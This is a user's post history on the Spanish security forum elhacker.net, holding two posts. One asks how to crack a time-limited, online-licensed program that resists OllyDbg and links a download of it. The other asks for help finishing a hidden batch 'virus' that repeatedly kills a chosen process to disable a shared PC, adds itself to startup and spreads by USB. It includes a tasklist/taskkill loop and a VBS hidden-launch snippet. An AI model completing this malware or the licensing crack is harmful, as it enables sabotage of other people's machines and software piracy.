elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: [1]
1  Programación / Ingeniería Inversa / No se ejecuta el programa con OllyDbg en: 31 Agosto 2014, 02:59 am
Hola a todos... soy algo nuevo con el tema de hacer el crack del programa y cuando quise aplicarlo a un programa con las siguientes caracteristicas

Se conecta a internet para verificar un usuario y contraseña con duracion de x tiempo
tiene 2 "horas" gratis de uso

me encuentro que al poner Run en ollydbg no se ejecuta
si lo abro solo si abre normal
si lo abro primero y luego el olydbg el programa que quiero se cierra
si abro primero el ollydbg y luego el otro nunca abre


Que puedo hacer.. ?

Gracias

Edito:
olvide poner el link del programa
http://www.mediafire.com/download/bt02zd2091xwy4h/Programa.rar
2  Programación / Scripting / (BATCH)(AYUDA) Cerrar proceso y propagar por USB en: 29 Abril 2014, 06:33 am
Hola a todos

llevo muchisimo tiempo alejado del batch :D

Necesito hacer un pequeño "virus" que obviamente se ejecute de manera oculta y cierre x proceso con el fin de dejarlo inservible, añadirlo al arranque, y q se propague por la usb. (cabe aclarar que el pc tiene muchisimos usuarios)

lo que ya tengo hecho es
para buscar el proceso
Código:
:Bucle
tasklist | findstr /r /i "notepad.exe" > nul 2>&1 && taskkill /f /im notepad.exe > nul
ping -n 5 0.0.0.0 >> nul
Goto Bucle
para ocultar la ventana de CMD
Código:
set objshell = createobject("wscript.shell")
objshell.run "proceso.bat",vbhide
el problema es que agrego el de ocultar al registro de arranque y cuando inicia el pc me apaece que error en la linea 2, que el archivo no se encuentra...

Espero me puedan ayudar parceros

Gracias
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines